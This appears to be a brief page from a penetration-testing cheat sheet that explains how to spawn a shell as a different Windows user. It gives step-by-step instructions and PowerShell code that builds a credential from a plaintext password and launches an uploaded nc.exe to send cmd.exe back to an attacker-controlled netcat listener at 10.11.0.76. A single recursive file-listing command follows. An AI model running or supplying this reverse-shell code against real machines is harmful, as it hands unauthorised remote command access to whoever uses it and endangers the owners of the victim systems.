Spawn Shell as a different user

  • startup a netcat listener on your attacking machine

  • upload the nc.exe binary to the victim

  • execute the powershell commands below to connect back to your nc listener as the other user

$username = 'alice'

$password = 'aliceishere'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

Start-Process nc.exe -ArgumentList "-e C:\Windows\System32\cmd.exe 10.11.0.76 9002" -Credential $credential

View all files recursively

gci -recurse . | select fullname

Last updated